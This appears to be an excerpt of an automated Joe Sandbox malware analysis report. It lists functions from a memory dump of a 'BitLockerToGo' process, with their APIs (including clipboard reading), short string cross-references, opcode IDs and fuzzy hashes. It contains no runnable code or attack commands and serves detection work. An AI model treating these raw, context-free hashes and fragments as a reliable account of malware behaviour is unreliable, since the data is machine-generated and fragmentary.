Instruction Fuzzy Hash: A70128317087009FD3088F68D86135FBBA2EFC4229F14C62DE5A9476D8C77588199B41

Function 00E56E52 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00E56EA3

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 868fa3e4911b084680b404742360461cb1ab9053e0fb417c388085e750b6d1d7
Instruction ID: 0cc29ace6bc35cb21a3f353f02ba3e6310cd78e3fa8799cc4964cda86670da5f
Opcode Fuzzy Hash: 868fa3e4911b084680b404742360461cb1ab9053e0fb417c388085e750b6d1d7
Instruction Fuzzy Hash: 9CF08B755012504FC714BF38C186BAD77E4BF81305F090A2CD89D972C2CB345A84D711

Function 00E297F9 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00E298CF
ExitProcess.KERNEL32 ref: 00E298E6

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: CloseExitHandleProcess
String ID:
API String ID: 1046136549-0
Opcode ID: 6aa1d016105524b5ec665708bd20321c24f35b7384a528f98c97c9bc30ddf9f1
Instruction ID: 2fe5b1d3c687b0f9747b4823df43a8331fd7a7ef0d8ff4a21832df854cc35410
Opcode Fuzzy Hash: 6aa1d016105524b5ec665708bd20321c24f35b7384a528f98c97c9bc30ddf9f1
Instruction Fuzzy Hash: 02C0807000C221C7DB1C3730B50536D37D05B01355F183425D88371046D7744094D753

Function 00E29716 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00E298E6

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e0afb57f8700d391fca135c99aa0070896a30d54b6c38619f7306dbd8bfb8e33
Instruction ID: 1321a8e05ea4f4baa84632f0808044ec5a557aa19f1e4793df364dc0a3924008
Opcode Fuzzy Hash: e0afb57f8700d391fca135c99aa0070896a30d54b6c38619f7306dbd8bfb8e33
Instruction Fuzzy Hash: 9CB012B01141404AD7483B31B80832639E09B01302F101534D48292040D27450488B53

Non-executed Functions

Function 00E4FE11 Relevance: 63.2, APIs: 1, Strings: 35, Instructions: 250memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00E4FEED

Strings

k, xrefs: 00E4FF30
A, xrefs: 00E4FFFD
0, xrefs: 00E50229
I, xrefs: 00E4FFD5
Y, xrefs: 00E4FF85
Y, xrefs: 00E4FF76
w, xrefs: 00E4FF12
S, xrefs: 00E4FFB7
U, xrefs: 00E4FFC1
`, xrefs: 00E4FE3C
C, xrefs: 00E50007
}, xrefs: 00E50039
z, xrefs: 00E4FF8A
K, xrefs: 00E4FFDF
k, xrefs: 00E4FE2C
t, xrefs: 00E4FF4E
^, xrefs: 00E4FF3A
V, xrefs: 00E4FF6C
[, xrefs: 00E4FF8F
d, xrefs: 00E4FF62
H, xrefs: 00E4FF1C
{, xrefs: 00E5002F
C, xrefs: 00E4FF08
s, xrefs: 00E4FF26
W, xrefs: 00E4FFCB
|, xrefs: 00E50034
G, xrefs: 00E5001B
E, xrefs: 00E50011
O, xrefs: 00E4FFF3
_, xrefs: 00E4FFA3
M, xrefs: 00E4FFE9
y, xrefs: 00E50025
Q, xrefs: 00E4FFAD
], xrefs: 00E4FF99
w, xrefs: 00E4FE1C

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 0$A$C$C$E$G$H$I$K$M$O$Q$S$U$V$W$Y$Y$[$]$^$_$`$d$k$k$s$t$w$w$y$z${$|$}
API String ID: 2525500382-1760961027
Opcode ID: 6859ce1009ee24b34b8a48fc2dee9f22580e2e59dc1147aa298e5f83e91a60de
Instruction ID: 144839a620548a9c8e76fa834a3667618d1e3bfd3f0bea85c712086228033514
Opcode Fuzzy Hash: 6859ce1009ee24b34b8a48fc2dee9f22580e2e59dc1147aa298e5f83e91a60de
Instruction Fuzzy Hash: 83B1686150CBC18AD322D77C884434FBFD12BE2224F485AACF1E99B3E2C6A98545C763

Function 00E51759 Relevance: 63.2, APIs: 1, Strings: 35, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00E51835

Strings

M, xrefs: 00E51931
W, xrefs: 00E51913
C, xrefs: 00E5194F
I, xrefs: 00E5191D
], xrefs: 00E518E1
H, xrefs: 00E51864
A, xrefs: 00E51945
}, xrefs: 00E51981
Q, xrefs: 00E518F5
V, xrefs: 00E518B4
d, xrefs: 00E518AA
_, xrefs: 00E518EB
|, xrefs: 00E5197C
k, xrefs: 00E51774
0, xrefs: 00E51B71
C, xrefs: 00E51850
t, xrefs: 00E51896
`, xrefs: 00E51784
k, xrefs: 00E51878
^, xrefs: 00E51882
s, xrefs: 00E5186E
E, xrefs: 00E51959
G, xrefs: 00E51963
w, xrefs: 00E51764
y, xrefs: 00E5196D
U, xrefs: 00E51909
K, xrefs: 00E51927
Y, xrefs: 00E518BE
{, xrefs: 00E51977
w, xrefs: 00E5185A
[, xrefs: 00E518D7
O, xrefs: 00E5193B
Y, xrefs: 00E518CD
z, xrefs: 00E518D2
S, xrefs: 00E518FF

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 0$A$C$C$E$G$H$I$K$M$O$Q$S$U$V$W$Y$Y$[$]$^$_$`$d$k$k$s$t$w$w$y$z${$|$}
API String ID: 2525500382-1760961027
Opcode ID: a0a23d9e432fb05dfb291bc28261e631f9e92a32942e4a9410ab952492dd088a
Instruction ID: 9cc4482c22a85afbdaeb6f82e92c4330dd3f3142e4dd4897dfa644684d4ab122
Opcode Fuzzy Hash: a0a23d9e432fb05dfb291bc28261e631f9e92a32942e4a9410ab952492dd088a
Instruction Fuzzy Hash: 12B1786150CBC18AD322D77C884434FBED12BE6224F485FACF5E99B3E2C6A98505C763

Function 00E4C060 Relevance: 34.0, Strings: 27, Instructions: 210COMMON

Download Yara Rule

Strings

b, xrefs: 00E4C6DF
, xrefs: 00E4C553
j, xrefs: 00E4C230
n, xrefs: 00E4C27D
t, xrefs: 00E4C2D5
z, xrefs: 00E4C343
l, xrefs: 00E4C251
m, xrefs: 00E4C267
^, xrefs: 00E4C6C9
e, xrefs: 00E4C6F5
}, xrefs: 00E4C36F
n, xrefs: 00E4C196
:, xrefs: 00E4C1F9
[, xrefs: 00E4C6B3
h, xrefs: 00E4C70B
W, xrefs: 00E4C69D
$, xrefs: 00E4C23B
w, xrefs: 00E4C317
x, xrefs: 00E4C737
r, xrefs: 00E4C2B4
u, xrefs: 00E4C2EB
S, xrefs: 00E4C072
p, xrefs: 00E4C721
v, xrefs: 00E4C301
~, xrefs: 00E4C763
G, xrefs: 00E4C671
{, xrefs: 00E4C74D

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $$:$G$S$W$[$^$b$e$h$j$l$m$n$n$p$r$t$u$v$w$x$z${$}$~$
API String ID: 0-1672377747
Opcode ID: bf18fcd60b39706cc610736c22fade607f0e112edd0f3da4c2d39a418b287d3b
Instruction ID: b426f94cdfc892a2f3517e35eff4ba5c8311f461587c9b33f9e13f53f8e21297
Opcode Fuzzy Hash: bf18fcd60b39706cc610736c22fade607f0e112edd0f3da4c2d39a418b287d3b
Instruction Fuzzy Hash: 95F12AB05897818FD3718F01E55A78FBBE8BBC5389F48AD1C91D82A252C7B65148CF87

Function 00E51E90 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 216clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00E51EE1
GetWindowLongW.USER32 ref: 00E51F0C
GetClipboardData.USER32 ref: 00E51F1F
GlobalLock.KERNEL32 ref: 00E51F3D

Strings

, xrefs: 00E51EC9
mv~, xrefs: 00E51FEA

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$DataGlobalLockLongOpenWindow
String ID: mv~$
API String ID: 2401467216-577498294
Opcode ID: cc0e3bf431826dfa018ab6bbea540e93205b9465701ac0344f33c1d187452770
Instruction ID: b6bac0a272304af107fe5885440dff06c8c3fa2f3abf16cf30f5c9885ea7215c
Opcode Fuzzy Hash: cc0e3bf431826dfa018ab6bbea540e93205b9465701ac0344f33c1d187452770
Instruction Fuzzy Hash: 9981C172604B408FC724DF3DC845656BBE1AF96324B189B6DE8EACB791DB30E405CB52

Function 00E48550 Relevance: 14.2, APIs: 1, Strings: 6, Instructions: 1917COMMON

Download Yara Rule

Strings

T{<, xrefs: 00E4ABD7
<VXx, xrefs: 00E4B73A
~N, xrefs: 00E48715
8411, xrefs: 00E48648
/<8*, xrefs: 00E4863E
`{<, xrefs: 00E4AC79

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /<8*$8411$<VXx$T{<$`{<$~N
API String ID: 0-3885259004
Opcode ID: 33c420d0612b32e6496b5cf5e90f9e774ba1b0daf919803ced9e182aa5722cbb
Instruction ID: 959c0ce1cbdb37f0f919420779eee0c8e5448721a46d23675775700db7a11ae8
Opcode Fuzzy Hash: 33c420d0612b32e6496b5cf5e90f9e774ba1b0daf919803ced9e182aa5722cbb
Instruction Fuzzy Hash: 46E20775605B418BE728CF39D8917A3BBE2BF95304F189A6DC0EB97381DB78A405CB50

Function 00E52A9A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 179COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00E52B14
GetSystemMetrics.USER32 ref: 00E52B25
DeleteObject.GDI32 ref: 00E52B89
SelectObject.GDI32 ref: 00E52BD7
SelectObject.GDI32 ref: 00E52C71
DeleteObject.GDI32 ref: 00E52CA8

Strings

, xrefs: 00E52C44

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 4b978ebd05b1a5fb0f2ff4d1acbb197cf82e168a7ecc4147541321eb4c321355
Instruction ID: a516d3715df9337f6ca7a37df84f94cc49d4cb3c7ffa14a7ac9da418aa484d6d
Opcode Fuzzy Hash: 4b978ebd05b1a5fb0f2ff4d1acbb197cf82e168a7ecc4147541321eb4c321355
Instruction Fuzzy Hash: 0F817CB4604B009FC354EF29D585A1ABBF0FF8A340F10896DE99ACB760D771A848CF52

Function 00E389F0 Relevance: 10.3, Strings: 8, Instructions: 335COMMON

Download Yara Rule

Strings

+$)8, xrefs: 00E38C06
,, xrefs: 00E38C0E
3#3, xrefs: 00E38BD6
..., xrefs: 00E38BDE
fc, xrefs: 00E38CEF
D, xrefs: 00E38CF9
"?= , xrefs: 00E38BE6
06!0, xrefs: 00E38BF6

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "?= $+$)8$,$...$06!0$3#3$D$fc
API String ID: 0-978669534
Opcode ID: 62c1fb1d50d0115b5961080044a8fdbc34f0846988cc8c0075daccf29962cbfb
Instruction ID: b38cd3fd435b92b20a47d019cd045b90de5b3b6d699095a59d3d42715adc1889
Opcode Fuzzy Hash: 62c1fb1d50d0115b5961080044a8fdbc34f0846988cc8c0075daccf29962cbfb
Instruction Fuzzy Hash: 01B1EF7160C3908FC7258F28C4903ABBBE2AF95304F19996DE4D95B382CA349906CB92

Function 00E43ED2 Relevance: 7.6, Strings: 6, Instructions: 115COMMON

Download Yara Rule

Strings

ChoV, xrefs: 00E43E18
AF@o, xrefs: 00E43E08
BFDv, xrefs: 00E43E20
jNmj, xrefs: 00E43E10
]sqx, xrefs: 00E43DF0
Yvnw, xrefs: 00E43DF8

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: AF@o$BFDv$ChoV$Yvnw$]sqx$jNmj
API String ID: 0-3356095760
Opcode ID: 1dcc38bd7d33c3082d8818af3c927e907c8be7bb31c0bc49bb912cf052a724b8
Instruction ID: 074155ad3e72990103d72072ec3cf6ab63018a09566df9ccd4afdf61321d5a95
Opcode Fuzzy Hash: 1dcc38bd7d33c3082d8818af3c927e907c8be7bb31c0bc49bb912cf052a724b8
Instruction Fuzzy Hash: 6E417AB28183A08BC720DF25844174BBBE0FFC6380F65895DE9D56B229C7B48909CF96

Function 00E37599 Relevance: 6.7, Strings: 5, Instructions: 404COMMON

Download Yara Rule

Strings

<]?_, xrefs: 00E37682
uOvJ, xrefs: 00E375A9
{hgj, xrefs: 00E375B1
nn, xrefs: 00E375B9
FCA}, xrefs: 00E3764E, 00E37652

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: <]?_$FCA}$nn$uOvJ${hgj
API String ID: 0-2979659840
Opcode ID: 68de0ad20275d9a2e2efb1872c74b59402d3e4d9177da979e8fb7d1c62fb8c78
Instruction ID: ea8d5cc0358c4ac928231d821c3c15da9efb8b09ae78deabc047e662a5ec74cb
Opcode Fuzzy Hash: 68de0ad20275d9a2e2efb1872c74b59402d3e4d9177da979e8fb7d1c62fb8c78
Instruction Fuzzy Hash: E7D19AB6A083019BC714CF14D89166BBBE1FFD8314F18992DF899A7351EB34E905CB92

Function 00E46516 Relevance: 6.6, Strings: 5, Instructions: 379COMMON

Download Yara Rule

Strings

3]!_, xrefs: 00E46522
i, xrefs: 00E469E3
zu, xrefs: 00E46572
=Y,[, xrefs: 00E4652A
zU9W, xrefs: 00E46532

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 3]!_$=Y,[$zU9W$zu$i
API String ID: 0-2611228787
Opcode ID: bc3424fe0c473f2ce553cf7de5dc47e9338e39cefde18a77a2e847fad12ebde2
Instruction ID: ea33500c72f214efc28b1307e430d32b752c37f1e24b65f64ea1ecbc2f95dbe1
Opcode Fuzzy Hash: bc3424fe0c473f2ce553cf7de5dc47e9338e39cefde18a77a2e847fad12ebde2
Instruction Fuzzy Hash: 29C118729083218BC324CF18D89235BB7E1EFC5324F195A2DE8D5EB391E7789805CB82

Function 00E29FB0 Relevance: 6.6, Strings: 5, Instructions: 363COMMON

Download Yara Rule

Strings

Dfb{, xrefs: 00E2A105
95?4, xrefs: 00E2A182
(, xrefs: 00E2A369
9#, xrefs: 00E2A362
;=14, xrefs: 00E2A17A

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ($9#$95?4$;=14$Dfb{
API String ID: 0-3213165114
Opcode ID: 15f3f1d433526717be3fa9b6c0f8f27af341ab43c7765871ecce931e45587f57
Instruction ID: 5a9459b6d1144ce833975f1545650b078c938664c8796fbf53c8203f2883a1e2
Opcode Fuzzy Hash: 15f3f1d433526717be3fa9b6c0f8f27af341ab43c7765871ecce931e45587f57
Instruction Fuzzy Hash: FFC103726183918BC725CF28D49136BBBE1EF86308F18896DE4D9DB352C779C905CB82

Function 00E49002 Relevance: 6.4, APIs: 1, Strings: 2, Instructions: 1194COMMON

Download Yara Rule

Strings

GDEJ, xrefs: 00E49152
?C7F, xrefs: 00E496F2

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?C7F$GDEJ
API String ID: 0-1514173340
Opcode ID: b48123e269c5bc3343d8eff2ec97b03ceb3550260970c611acbc443410484b9a
Instruction ID: 44231114b4e3ba7557633e098fcfe9df60ec28ab896566e49d898c7a9d29c26e
Opcode Fuzzy Hash: b48123e269c5bc3343d8eff2ec97b03ceb3550260970c611acbc443410484b9a
Instruction Fuzzy Hash: E4821875205B418BD328CF39D8917A7BBE2BF95314F189A2DC0EBA7792D778A405CB10

Function 00E3FE80 Relevance: 5.6, Strings: 4, Instructions: 611COMMON

Download Yara Rule

Strings

E9(, xrefs: 00E40247
|}, xrefs: 00E4068D
5, xrefs: 00E4058A
|}, xrefs: 00E3FECF

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 5$E9($|}$|}
API String ID: 0-269211336
Opcode ID: dd277795ae0d083017ef3fe58b01ea4d2560e3b2924c2ff34231f636d6b30d00
Instruction ID: 52f0c26f036a0e95d70dc3fdd11d3b6bad0d7d1f5d08f7055c86785ed99cde56
Opcode Fuzzy Hash: dd277795ae0d083017ef3fe58b01ea4d2560e3b2924c2ff34231f636d6b30d00
Instruction Fuzzy Hash: 9322F2B2A583508FD320CF25D88135BBBE1EFC5754F159A2CE9D8AB391D778C9058B82

Function 00E5DC3B Relevance: 5.6, Strings: 4, Instructions: 589COMMON

Download Yara Rule

Strings

r, xrefs: 00E5E35D
@V, xrefs: 00E5E2E6
UW, xrefs: 00E5E103
@, xrefs: 00E5E33D

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @$@V$r$UW
API String ID: 0-1374738867
Opcode ID: c04a9d7dc36ab77a5cba5494840a082940ea41ab569a3f8ceab2077264c81dda
Instruction ID: 444797605d6610185ab7af7100d5130881cee9f1d1a9a3498988bbe8430a219b
Opcode Fuzzy Hash: c04a9d7dc36ab77a5cba5494840a082940ea41ab569a3f8ceab2077264c81dda
Instruction Fuzzy Hash: 7A021A776083118BD318CF29C89126BBBE2FFD4354F195A2DE896D7394DB78C8458B81

Function 00E3507B Relevance: 4.7, Strings: 3, Instructions: 968COMMON

Download Yara Rule

Strings

(), xrefs: 00E35636
G@AB, xrefs: 00E358FD
ec, xrefs: 00E35C53

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ()$G@AB$ec
API String ID: 0-3194252045
Opcode ID: 9ec1b6798dea858a3af07f81981a7a1381b550ec8fb991f72447eb9960eb4a85
Instruction ID: 61f30ca23af145a803a8ac6a14ed037792c3c148db6dd72ebbff65905615b29c
Opcode Fuzzy Hash: 9ec1b6798dea858a3af07f81981a7a1381b550ec8fb991f72447eb9960eb4a85
Instruction Fuzzy Hash: E2521472A187108FD314CF29C88176BBBE2EFC9354F19996DE4C9A7391E7749805CB82

Function 00E38990 Relevance: 4.7, Strings: 3, Instructions: 952COMMON

Download Yara Rule

Strings

vG, xrefs: 00E3958E
OO, xrefs: 00E39596
TB, xrefs: 00E3959E

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: OO$TB$vG
API String ID: 0-3436443176
Opcode ID: 51ee8ab210edbf6e3fe0001751bceab7422369319c4ca2a99575541437f89c60
Instruction ID: 632902f88ac55f75ce8e760c86141b01a456438122ab5b55c403b8be3686ca20
Opcode Fuzzy Hash: 51ee8ab210edbf6e3fe0001751bceab7422369319c4ca2a99575541437f89c60
Instruction Fuzzy Hash: F062DD729083508FD714CF29D85166BBBE1FFD5304F099A2DE4D5AB291E774CA05CB82

Function 00E38E26 Relevance: 4.7, Strings: 3, Instructions: 925COMMON

Download Yara Rule

Strings

vG, xrefs: 00E3958E
OO, xrefs: 00E39596
TB, xrefs: 00E3959E

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: OO$TB$vG
API String ID: 0-3436443176
Opcode ID: 0f699c3b496051360e6ff2b4c548e71d666f22896d730a21e2f92a035e8e344d
Instruction ID: 87c0e37d0a9626cbd3117198a7301a94d6d8c1eb17dc70f9a5c9f5849a4d67c5
Opcode Fuzzy Hash: 0f699c3b496051360e6ff2b4c548e71d666f22896d730a21e2f92a035e8e344d
Instruction Fuzzy Hash: E662DD729083508FD714CF29C85166BBBE1FFD5308F099A2DE4D9AB291D778CA05CB82

Function 00E34578 Relevance: 4.5, Strings: 3, Instructions: 721COMMON

Download Yara Rule

Strings

}-}, xrefs: 00E34A4E
b, xrefs: 00E3458D
q, xrefs: 00E34A2C

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: b$q$}-}
API String ID: 0-19760455
Opcode ID: 87328f42a292713dc0c2fe9e03d46f232f1a0dadc4bce2dba46ac821e4916885
Instruction ID: a17bd26162033ac12c217c1be9dcdcefbda6a3c38eadabec78f312b684835e43
Opcode Fuzzy Hash: 87328f42a292713dc0c2fe9e03d46f232f1a0dadc4bce2dba46ac821e4916885
Instruction Fuzzy Hash: 9A32E372A583408BD328CF28DC827DBBBE6ABD4304F09993DD5C8D7355DA7D99058B82

Function 00E35F37 Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

yK, xrefs: 00E35FD4
*, xrefs: 00E35F3E

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *$yK
API String ID: 0-3464242397
Opcode ID: 6577d989a4d226ab4b3812fa0d3047acb08f33b3a83d0858320bf857a7d73e1b
Instruction ID: 6b1c61ff8addf272fcd7ede32da0f18f2077f2e1d05f8ca50d5367d98c42266d
Opcode Fuzzy Hash: 6577d989a4d226ab4b3812fa0d3047acb08f33b3a83d0858320bf857a7d73e1b
Instruction Fuzzy Hash: 06315B32A193508FD314CB2CC84534BFAE3AFD5314F1AC26DD4D49B2E8D77488058B82

Function 00E32C26 Relevance: 2.4, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

P, xrefs: 00E338E9

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: f22f96afd87ea91b5624c4423a2c04e605d9b6366a31c29745154d1a5988b46e
Instruction ID: e4645fb03483e3fc1150d4f4a0d770d75f78cf0c5e735c9be81d88e32a0aa057
Opcode Fuzzy Hash: f22f96afd87ea91b5624c4423a2c04e605d9b6366a31c29745154d1a5988b46e
Instruction Fuzzy Hash: 00A273715083808FD365CF68C8817ABBBE0BF99318F488A5DE1DDDB342DA38D6498756

Function 00E30E42 Relevance: 1.8, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

b, xrefs: 00E31354

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: e66732ac3fb1713d79b7ecc7c9c797c1b3d3b2cad71ea2a50b1ac234c7c6c4d2
Instruction ID: 24385d8ada99564838e9d048c1be1194311e6fce19e043a4ccce477dfc3d1a0c
Opcode Fuzzy Hash: e66732ac3fb1713d79b7ecc7c9c797c1b3d3b2cad71ea2a50b1ac234c7c6c4d2
Instruction Fuzzy Hash: 15126E715083808FD325CF28C89179BBBE1BFD9308F598A6DE0CDDB251DA38954ACB56

Function 00E3E9C0 Relevance: 1.8, APIs: 1, Instructions: 253comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00E64740,00000000,00000001,00E64730), ref: 00E3E9E9

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e9973d17c9b385062b1d33027b64d1ff01adc6eac72cca6ac5c86a2fc3f46241
Instruction ID: 8b6ad56bb548e89d2464659a880dad087662e7ffea9fa63fb54a923c589f42d3
Opcode Fuzzy Hash: e9973d17c9b385062b1d33027b64d1ff01adc6eac72cca6ac5c86a2fc3f46241
Instruction Fuzzy Hash: 3E51F2B16002159BDB249B24CC9AB77BBB5FF91358F186528FA86AB3D0E775EC00C351

Function 00E47E80 Relevance: 1.6, Strings: 1, Instructions: 383COMMON

Download Yara Rule

Strings

", xrefs: 00E48148

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 47e174c29d8053aea19b56493552542f7aaea8c5f6da70b3b4d99550cf1e26f9
Instruction ID: ac8bba1907aeda069cd383b36190bb00eb0d7ee4052a70d4a848598164771c77
Opcode Fuzzy Hash: 47e174c29d8053aea19b56493552542f7aaea8c5f6da70b3b4d99550cf1e26f9
Instruction Fuzzy Hash: 48C189B1A083149FD720DE64E95076FB7D5AF81314F08992DE995A7382EB70DD48C3C1

Function 00E62000 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

'$%*, xrefs: 00E62060

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: '$%*
API String ID: 2994545307-279822230
Opcode ID: 29b8118f524c033eabb12c5e24b042e02a537c485d6e483c800982d545bb9bb6
Instruction ID: c1797b1aa1bcb3a581892b0c646b4c58668c1cbe2932bb148e543e7534e285d1
Opcode Fuzzy Hash: 29b8118f524c033eabb12c5e24b042e02a537c485d6e483c800982d545bb9bb6
Instruction Fuzzy Hash: 2AB117726487018FC718CF28DC9176BB7E1EB88358F08962CE59AE7391D774D9458B81

Function 00E2FA9F Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

x, xrefs: 00E30726
